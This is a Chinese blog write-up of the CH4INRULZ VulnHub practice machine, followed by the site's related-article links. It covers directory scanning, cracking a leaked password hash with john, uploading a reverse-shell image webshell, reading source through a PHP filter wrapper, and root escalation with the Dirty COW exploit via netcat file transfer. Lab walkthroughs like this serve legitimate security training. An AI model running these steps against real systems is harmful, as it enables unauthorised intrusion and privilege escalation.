CH4INRULZ vulnhub靶场

已于 2022-10-29 00:26:01 修改
阅读量677 收藏
点赞数
分类专栏: WP 文章标签: linux 运维 服务器 web安全
于 2022-10-25 00:27:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61778128/article/details/127505432
版权

首先还是进行nmap的扫描

在这里插入图片描述

发现是这个网站

在这里插入图片描述

接下来用dirb扫一下,发现一个development页面,打开看一下

在这里插入图片描述

打开发现给了一个登录框,还没法登陆,再看别的地方,继续扫一下备份文件,在linux系统里面bak结尾的备份文件比较多

dirb http://192.168.111.134 -X .bak    //通过X参数设定后缀

在这里插入图片描述

扫到了bak文件,可以直接用curl读取一下,

curl http://192.168.111.134/index.html.bak

在这里插入图片描述

这里只要重点看注释里的内容,看起来是用户名密码组合,用户名frank,密码貌似是被加密的,把用户名密码用txt保存,用john解密一下

frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0:  //还要加个冒号才能破解成功,不懂

john 1.txt --show

在这里插入图片描述

用获取到的这个用户名密码登陆刚刚的development目录里面的登录框

在这里插入图片描述

猜测还有一个uploader目录

在这里插入图片描述

上传一个图片马(反向连接的)

在这里插入图片描述

上传上去了但是不知道存储的位置

扫描一下8011端口的目录

在这里插入图片描述

访问文件接口

在这里插入图片描述

说要传一个文件名给它,我们尝试传给它我们刚刚上传的图片马名

在这里插入图片描述

可以读到文件

在这里插入图片描述

能读取到文件,可以尝试读取刚刚文件上传的那个php文件,以找到我们图片马上传的路径

这个文件直接被解析了,用php伪协议读一下就可以了
在这里插入图片描述

<?php
$target_dir = "FRANKuploads/";
$target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);
$uploadOk = 1;
$imageFileType = strtolower(pathinfo($target_file,PATHINFO_EXTENSION));
// Check if image file is a actual image or fake image
if(isset($_POST["submit"])) {
    $check = getimagesize($_FILES["fileToUpload"]["tmp_name"]);
    if($check !== false) {
        echo "File is an image - " . $check["mime"] . ".";
        $uploadOk = 1;
    } else {
        echo "File is not an image.";
        $uploadOk = 0;
    }
}
// Check if file already exists
if (file_exists($target_file)) {
    echo "Sorry, file already exists.";
    $uploadOk = 0;
}
// Check file size
if ($_FILES["fileToUpload"]["size"] > 500000) {
    echo "Sorry, your file is too large.";
    $uploadOk = 0;
}
// Allow certain file formats
if($imageFileType != "jpg" && $imageFileType != "png" && $imageFileType != "jpeg"
&& $imageFileType != "gif" ) {
    echo "Sorry, only JPG, JPEG, PNG & GIF files are allowed.";
    $uploadOk = 0;
}
// Check if $uploadOk is set to 0 by an error
if ($uploadOk == 0) {
    echo "Sorry, your file was not uploaded.";
// if everything is ok, try to upload file
} else {
    if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
        echo "The file ". basename( $_FILES["fileToUpload"]["name"]). " has been uploaded to my uploads path.";
    } else {
        echo "Sorry, there was an error uploading your file.";
    }
}
?>

在这个路径下

http://192.168.111.134/development/uploader/FRANKuploads/shell.gif

在刚刚的包含点包含一下,这个时候可以提前开启nc监听了

在这里插入图片描述

在这里插入图片描述

查看内核版本

在这里插入图片描述

只要内核版本大于2.4.22就可以使用脏牛提权

git clone https://github.com/FireFart/dirtycow.git

python -c 'import pty;pty.spawn("/bin/bash")'  //交互窗口

转到var路径看一下文件目录,找一个比较高的用户权限目录上传脏牛,那个a可以

在这里插入图片描述

cd a
nc -l 1212 >dcow.tar.gz
nc 192.168.111.134 1212< dcow.tar.gz
tar -xzvf dcow.tar.gz
cd CVE-2016-5195-master
make
./dcow
su
MUNG东隅
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
vulhub - CH4INRULZ_v1.0.1 writeup
Jiajiajiang_的博客
04-01 1409
主机来源:www.vulnhub.com 下载链接:https://www.vulnhub.com/entry/ch4inrulz-101,247/ 准备工作: 下载.ova文件,直接双击即可安装成功 设置连接方式为NAT,攻击机器使用kali,也设置为NAT。 发现IP 刚安装的虚拟机并不知道IP地址,使用netdiscover发现IP。 简介下netdiscover的用法...
靶机CH4INRULZ_V1练习报告1
08-08
靶机CH4INRULZ_V1练习报告1
VulnHubCH4INRULZ_v1.0.1
qq_61768489的博客
09-09 1093
刚才上传文件后在/development/uploader/upload.php有回显,尝试读取这个upload.php。没有file参数发送给我 ,所以猜测这里可以传file参数,尝试了一下是post传参。文件读取刚刚上传的webshell.gif ,成功让gif文件以PHP执行。正在开发的api接口, 猜测files_api.php 可以文件读取。得到一组用户名和密码, frank frank!这里出问题了 ,靶机的g++环境有问题?然后访问到a目录发现 脚本上传成功,解压脚本。
CH4INRULZ_v1.0.1
devil8123665的博客
02-15 352
CH4INRULZ_v1.0.1 1 john暴破密码 讲账号,更改为/etc/passwd的账号格式,。例如破解kali下的账号密码 第一步:unshadow /etc/passwd /etc/shadow > shadow_test 第二部:john shadow_test 便可以破解账号,如果破解过一次,可以使用john –show shadow_test 查看结果,或者...
OSCP - CH4INRULZ_v1.0.1 的破解
kevinhanser
03-05 2153
本文主要记录对 CH4INRULZ_v1.0.1 的渗透学习过程,测试的 VM 主机主要来源 www.vulnhub.com 博客集:面向 CTF 的 VM 破解系列 下载链接:CH4INRULZ_v1.0.1 系统为DHCP,不知道IP,可以使用 netdiscover root@kali:~# netdiscover -r 10.10.10.0/24 Currently scann...
Vulnhub靶机实战-CH4INRULZ
黑白的博客
01-18 450
声明 好好学习,天天向上 搭建 使用vmware打开 渗透 存活扫描,发现目标 arp-scan -l 端口扫描 nmap -T4 -A 192.168.31.180 -p 1-65535 -oN nmap.A 开启端口 发现开启21,22,80,8011 访问80 http://192.168.31.180 扫描web目录 python3 dirsearch.py -u 192.168.31.180 development中得登录 index中告诉我们还没开发完 剩下的没什么消息了 访问备份文
Vulnhub靶场渗透-CH4INRULZ_v1.0.1
paidx0
09-24 619
前言 靶机ip(192.168.110.135) 攻击机ip(192.168.110.127) 网络NAT模式 直接开始 信息收集 吃了上次的亏,这次就比较详细的扫了一下端口 发现 ftp服务的2.3.4版本在 msf中可以直接利用,但这是2.3.5版本,抱着试一试去搞了一下,哈哈哈没有任何作用 扫描 80 端口 扫描 8011 端口 看见 8011 的结果里有 index.html,直觉告诉我可能有备份文件 对这个解密,拿到一对账号密码 ...
Ch4.rar_CH4
07-14
数字图像处理,利用matlab开发环境进行编程实践。
ch4.zip_java ch4
09-19
Java 字符串举例,展示了字符串的运用
CH4.rar_CH4_C语言
09-23
c语言常用算法,非常有用。
ch4-Threads.ppt
01-03
ch4-Threads.ppt
【B2R】CH4INRUIZ1.0.1
qq_44339430的博客
03-26 691
【B2R】CH4INRUIZ:1.0.1 靶场地址:www.vulnhub.com/entry/ch4inrulz-101%2C247/ 0x01 靶场信息 靶场描述 Description Back to the Top Frank has a small website and he is a smart developer with a normal security background , he always love to follow patterns , your goal is to d
Linux fallocate工具用于预分配或释放文件空间的块
不积跬步,无以至千里;不积小流,无以成江海。
06-09 311
命令,您需要在具有适当权限的环境中运行它,例如通过SSH登录到Linux服务器或在Linux终端中运行。请确保指定的路径存在且可写。文件中未使用的磁盘空间。请注意,这不会改变文件的大小,只是释放了未使用的磁盘空间。之前,建议了解文件系统和存储设备的特性,以避免潜在的性能问题。是一个Linux命令行工具,用于预分配或释放文件空间的块。文件的大小截断为5MB。大于5MB的部分将被删除。文件的10MB偏移量处开始预分配5MB的磁盘空间。文件的10MB偏移量处开始的5MB磁盘空间。文件预分配10MB的磁盘空间。
解决 Linux 和 Java 1.8 中上传中文名称图片报错问题
appearappear的博客
06-12 260
Linux 系统和 Java 1.8 中,当尝试上传含有中文名称的图片时,可能会遇到以下错误提示:为了解决这个问题,可以采取以下方法:在 Docker 的 中添加如下参数:Dockerfile使用以下命令启动 Java 程序,添加 参数:通过以上配置,确保了在启动 Java 程序时,使用了 UTF-8 编码,这样可以正确处理含有中文名称的文件,避免了报错问题的发生。3.5
linux中: IDEA 由于JVM 设置内存过小,导致打开项目闪退问题
最新发布
m0_72560900的博客
06-12 379
linux(debian/ubuntu)中idea的插件默认安装位置和配置文件在哪里?
Linux下的动态链接和静态链接 及 调用libevent库函数的可执行文件无法正常运行情况剖析】
一起学习进步!
06-09 328
静态链接是指在编译时,将程序所依赖的函数或数据直接复制到最终的可执行文件中。这意味着可执行文件包含了程序运行所需的所有代码和数据。动态链接是指在运行时,程序所依赖的函数或数据从外部的共享库(shared library)中加载。这意味着可执行文件只包含了必要的引用信息,而实际的代码和数据则存储在外部的共享库中。
Linux基础命令
威桑的博客
06-11 947
常见基础Linux命令
NVIDIA Jetson Linux 35.3.1-开发指南-Jetson软件架构
FREEDOM_X的专栏
06-11 759
下图显示了NVIDIA®Jetson™Linux架构。以下部分描述了每个模块的组件。在本开发人员指南或其他地方,许多组件的名称是指向组件主留档的链接。一些组件具有带有附加描述的单独链接。
python ch4安装
05-24
选择适合你操作系统的版本,如果你不确定该选择哪个版本,可以选择默认的安装程序。 在下载完安装包后,运行安装程序,打开“安装向导”窗口。在这个窗口中,你可以选择安装路径和一些其他选项。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

MUNG东隅

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值